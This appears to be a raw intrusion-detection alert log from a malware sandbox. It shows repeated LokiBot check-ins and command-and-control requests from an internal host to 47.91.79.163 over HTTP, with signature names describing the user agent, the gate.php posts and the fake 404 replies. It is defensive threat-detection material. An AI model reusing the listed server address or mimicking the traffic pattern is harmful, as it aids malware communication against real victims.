                                    12/03/20-10:03:24.680367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.680367TCP2025381ET TROJAN LokiBot Checkin4988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.680367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.680367TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988080192.168.2.347.91.79.163
                                    12/03/20-10:03:24.744697TCP2025483ET TROJAN LokiBot Fake 404 Response804988047.91.79.163192.168.2.3
                                    12/03/20-10:03:25.184133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.184133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.184133TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.184133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.184133TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988180192.168.2.347.91.79.163
                                    12/03/20-10:03:25.245221TCP2025483ET TROJAN LokiBot Fake 404 Response804988147.91.79.163192.168.2.3
                                    12/03/20-10:03:25.660223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.660223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.660223TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.660223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.660223TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988280192.168.2.347.91.79.163
                                    12/03/20-10:03:25.718343TCP2025483ET TROJAN LokiBot Fake 404 Response804988247.91.79.163192.168.2.3
                                    12/03/20-10:03:26.190091TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.190091TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.190091TCP2025381ET TROJAN LokiBot Checkin4988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.190091TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.190091TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988380192.168.2.347.91.79.163
                                    12/03/20-10:03:26.256451TCP2025483ET TROJAN LokiBot Fake 404 Response804988347.91.79.163192.168.2.3
                                    12/03/20-10:03:26.801024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.801024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.801024TCP2025381ET TROJAN LokiBot Checkin4988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.801024TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.801024TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988480192.168.2.347.91.79.163
                                    12/03/20-10:03:26.861568TCP2025483ET TROJAN LokiBot Fake 404 Response804988447.91.79.163192.168.2.3
                                    12/03/20-10:03:27.069096TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.069096TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.069096TCP2025381ET TROJAN LokiBot Checkin4988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.069096TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.069096TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988580192.168.2.347.91.79.163
                                    12/03/20-10:03:27.127992TCP2025483ET TROJAN LokiBot Fake 404 Response804988547.91.79.163192.168.2.3
                                    12/03/20-10:03:27.591079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.591079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.591079TCP2025381ET TROJAN LokiBot Checkin4988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.591079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.591079TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988680192.168.2.347.91.79.163
                                    12/03/20-10:03:27.649520TCP2025483ET TROJAN LokiBot Fake 404 Response804988647.91.79.163192.168.2.3
                                    12/03/20-10:03:28.103034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.103034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.103034TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.103034TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.103034TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988780192.168.2.347.91.79.163
                                    12/03/20-10:03:28.169105TCP2025483ET TROJAN LokiBot Fake 404 Response804988747.91.79.163192.168.2.3
                                    12/03/20-10:03:28.370667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.370667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.370667TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.370667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.370667TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988880192.168.2.347.91.79.163
                                    12/03/20-10:03:28.577908TCP2025483ET TROJAN LokiBot Fake 404 Response804988847.91.79.163192.168.2.3
                                    12/03/20-10:03:28.995903TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.2.347.91.79.163
                                    12/03/20-10:03:28.995903TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.2.347.91.79.163
                                    12/03/20-10:03:28.995903TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.347.91.79.163
                                    12/03/20-10:03:28.995903TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.2.347.91.79.163
                                    12/03/20-10:03:28.995903TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4988980192.168.2.347.91.79.163
                                    12/03/20-10:03:29.054012TCP2025483ET TROJAN LokiBot Fake 404 Response804988947.91.79.163192.168.2.3
                                    12/03/20-10:03:29.261436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.261436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.261436TCP2025381ET TROJAN LokiBot Checkin4989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.261436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.261436TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989080192.168.2.347.91.79.163
                                    12/03/20-10:03:29.322723TCP2025483ET TROJAN LokiBot Fake 404 Response804989047.91.79.163192.168.2.3
                                    12/03/20-10:03:29.906200TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.906200TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.906200TCP2025381ET TROJAN LokiBot Checkin4989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.906200TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.906200TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989180192.168.2.347.91.79.163
                                    12/03/20-10:03:29.963618TCP2025483ET TROJAN LokiBot Fake 404 Response804989147.91.79.163192.168.2.3
                                    12/03/20-10:03:30.476261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.476261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.476261TCP2025381ET TROJAN LokiBot Checkin4989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.476261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.476261TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989280192.168.2.347.91.79.163
                                    12/03/20-10:03:30.536401TCP2025483ET TROJAN LokiBot Fake 404 Response804989247.91.79.163192.168.2.3
                                    12/03/20-10:03:30.994100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.2.347.91.79.163
                                    12/03/20-10:03:30.994100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.2.347.91.79.163
                                    12/03/20-10:03:30.994100TCP2025381ET TROJAN LokiBot Checkin4989380192.168.2.347.91.79.163
                                    12/03/20-10:03:30.994100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.2.347.91.79.163
                                    12/03/20-10:03:30.994100TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989380192.168.2.347.91.79.163
                                    12/03/20-10:03:31.054595TCP2025483ET TROJAN LokiBot Fake 404 Response804989347.91.79.163192.168.2.3
                                    12/03/20-10:03:31.259183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.259183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.259183TCP2025381ET TROJAN LokiBot Checkin4989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.259183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.259183TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989480192.168.2.347.91.79.163
                                    12/03/20-10:03:31.328925TCP2025483ET TROJAN LokiBot Fake 404 Response804989447.91.79.163192.168.2.3
                                    12/03/20-10:03:31.751251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.751251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.751251TCP2025381ET TROJAN LokiBot Checkin4989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.751251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.751251TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989580192.168.2.347.91.79.163
                                    12/03/20-10:03:31.807705TCP2025483ET TROJAN LokiBot Fake 404 Response804989547.91.79.163192.168.2.3
                                    12/03/20-10:03:32.014316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.014316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.014316TCP2025381ET TROJAN LokiBot Checkin4989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.014316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.014316TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989680192.168.2.347.91.79.163
                                    12/03/20-10:03:32.077873TCP2025483ET TROJAN LokiBot Fake 404 Response804989647.91.79.163192.168.2.3
                                    12/03/20-10:03:32.604345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.604345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.604345TCP2025381ET TROJAN LokiBot Checkin4989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.604345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.604345TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989780192.168.2.347.91.79.163
                                    12/03/20-10:03:32.665530TCP2025483ET TROJAN LokiBot Fake 404 Response804989747.91.79.163192.168.2.3
                                    12/03/20-10:03:32.863168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.863168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.863168TCP2025381ET TROJAN LokiBot Checkin4989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.863168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.863168TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989880192.168.2.347.91.79.163
                                    12/03/20-10:03:32.924295TCP2025483ET TROJAN LokiBot Fake 404 Response804989847.91.79.163192.168.2.3
                                    12/03/20-10:03:33.437469TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.437469TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.437469TCP2025381ET TROJAN LokiBot Checkin4989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.437469TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.437469TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4989980192.168.2.347.91.79.163
                                    12/03/20-10:03:33.495292TCP2025483ET TROJAN LokiBot Fake 404 Response804989947.91.79.163192.168.2.3
                                    12/03/20-10:03:33.936415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.936415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.936415TCP2025381ET TROJAN LokiBot Checkin4990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.936415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.936415TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990080192.168.2.347.91.79.163
                                    12/03/20-10:03:33.997836TCP2025483ET TROJAN LokiBot Fake 404 Response804990047.91.79.163192.168.2.3
                                    12/03/20-10:03:34.447921TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.447921TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.447921TCP2025381ET TROJAN LokiBot Checkin4990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.447921TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.447921TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990180192.168.2.347.91.79.163
                                    12/03/20-10:03:34.507785TCP2025483ET TROJAN LokiBot Fake 404 Response804990147.91.79.163192.168.2.3
                                    12/03/20-10:03:34.942138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.2.347.91.79.163
                                    12/03/20-10:03:34.942138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.2.347.91.79.163
                                    12/03/20-10:03:34.942138TCP2025381ET TROJAN LokiBot Checkin4990280192.168.2.347.91.79.163
                                    12/03/20-10:03:34.942138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.2.347.91.79.163
                                    12/03/20-10:03:34.942138TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990280192.168.2.347.91.79.163
                                    12/03/20-10:03:35.009032TCP2025483ET TROJAN LokiBot Fake 404 Response804990247.91.79.163192.168.2.3
                                    12/03/20-10:03:35.504309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.504309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.504309TCP2025381ET TROJAN LokiBot Checkin4990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.504309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.504309TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990380192.168.2.347.91.79.163
                                    12/03/20-10:03:35.563085TCP2025483ET TROJAN LokiBot Fake 404 Response804990347.91.79.163192.168.2.3
                                    12/03/20-10:03:36.040003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.040003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.040003TCP2025381ET TROJAN LokiBot Checkin4990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.040003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.040003TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990480192.168.2.347.91.79.163
                                    12/03/20-10:03:36.106219TCP2025483ET TROJAN LokiBot Fake 404 Response804990447.91.79.163192.168.2.3
                                    12/03/20-10:03:36.607418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.607418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.607418TCP2025381ET TROJAN LokiBot Checkin4990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.607418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.607418TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990580192.168.2.347.91.79.163
                                    12/03/20-10:03:36.665095TCP2025483ET TROJAN LokiBot Fake 404 Response804990547.91.79.163192.168.2.3
                                    12/03/20-10:03:37.095774TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.095774TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.095774TCP2025381ET TROJAN LokiBot Checkin4990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.095774TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.095774TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990680192.168.2.347.91.79.163
                                    12/03/20-10:03:37.155846TCP2025483ET TROJAN LokiBot Fake 404 Response804990647.91.79.163192.168.2.3
                                    12/03/20-10:03:37.635993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.635993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.635993TCP2025381ET TROJAN LokiBot Checkin4990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.635993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.635993TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990780192.168.2.347.91.79.163
                                    12/03/20-10:03:37.696414TCP2025483ET TROJAN LokiBot Fake 404 Response804990747.91.79.163192.168.2.3
                                    12/03/20-10:03:38.137931TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.137931TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.137931TCP2025381ET TROJAN LokiBot Checkin4990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.137931TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.137931TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990880192.168.2.347.91.79.163
                                    12/03/20-10:03:38.195618TCP2025483ET TROJAN LokiBot Fake 404 Response804990847.91.79.163192.168.2.3
                                    12/03/20-10:03:38.614970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.614970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.614970TCP2025381ET TROJAN LokiBot Checkin4990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.614970TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.614970TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4990980192.168.2.347.91.79.163
                                    12/03/20-10:03:38.673676TCP2025483ET TROJAN LokiBot Fake 404 Response804990947.91.79.163192.168.2.3
                                    12/03/20-10:03:39.153875TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.153875TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.153875TCP2025381ET TROJAN LokiBot Checkin4991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.153875TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.153875TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991080192.168.2.347.91.79.163
                                    12/03/20-10:03:39.215094TCP2025483ET TROJAN LokiBot Fake 404 Response804991047.91.79.163192.168.2.3
                                    12/03/20-10:03:39.682728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.682728TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.682728TCP2025381ET TROJAN LokiBot Checkin4991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.682728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.682728TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991180192.168.2.347.91.79.163
                                    12/03/20-10:03:39.788076TCP2025483ET TROJAN LokiBot Fake 404 Response804991147.91.79.163192.168.2.3
                                    12/03/20-10:03:40.012777TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.012777TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.012777TCP2025381ET TROJAN LokiBot Checkin4991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.012777TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.012777TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991280192.168.2.347.91.79.163
                                    12/03/20-10:03:40.177683TCP2025483ET TROJAN LokiBot Fake 404 Response804991247.91.79.163192.168.2.3
                                    12/03/20-10:03:40.407026TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.407026TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.407026TCP2025381ET TROJAN LokiBot Checkin4991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.407026TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.407026TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991380192.168.2.347.91.79.163
                                    12/03/20-10:03:40.478810TCP2025483ET TROJAN LokiBot Fake 404 Response804991347.91.79.163192.168.2.3
                                    12/03/20-10:03:40.694808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.694808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.694808TCP2025381ET TROJAN LokiBot Checkin4991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.694808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.694808TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991480192.168.2.347.91.79.163
                                    12/03/20-10:03:40.754847TCP2025483ET TROJAN LokiBot Fake 404 Response804991447.91.79.163192.168.2.3
                                    12/03/20-10:03:40.969555TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.2.347.91.79.163
                                    12/03/20-10:03:40.969555TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.2.347.91.79.163
                                    12/03/20-10:03:40.969555TCP2025381ET TROJAN LokiBot Checkin4991580192.168.2.347.91.79.163
                                    12/03/20-10:03:40.969555TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.2.347.91.79.163
                                    12/03/20-10:03:40.969555TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991580192.168.2.347.91.79.163
                                    12/03/20-10:03:41.031967TCP2025483ET TROJAN LokiBot Fake 404 Response804991547.91.79.163192.168.2.3
                                    12/03/20-10:03:41.260655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.260655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.260655TCP2025381ET TROJAN LokiBot Checkin4991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.260655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.260655TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991680192.168.2.347.91.79.163
                                    12/03/20-10:03:41.322048TCP2025483ET TROJAN LokiBot Fake 404 Response804991647.91.79.163192.168.2.3
                                    12/03/20-10:03:41.552180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.552180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.552180TCP2025381ET TROJAN LokiBot Checkin4991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.552180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.552180TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991780192.168.2.347.91.79.163
                                    12/03/20-10:03:41.623253TCP2025483ET TROJAN LokiBot Fake 404 Response804991747.91.79.163192.168.2.3
                                    12/03/20-10:03:41.839243TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.839243TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.839243TCP2025381ET TROJAN LokiBot Checkin4991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.839243TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.839243TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4991880192.168.2.347.91.79.163
                                    12/03/20-10:03:41.890986TCP2025483ET TROJAN LokiBot Fake 404 Response804991847.91.79.163192.168.2.3
                                    12/03/20-10:03:42.127761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.127761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.127761TCP2025381ET TROJAN LokiBot Checkin4991980192.168.2.347.91.79.163
                                    12/03/20-10:03:42.127761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.2.347.91.79.163
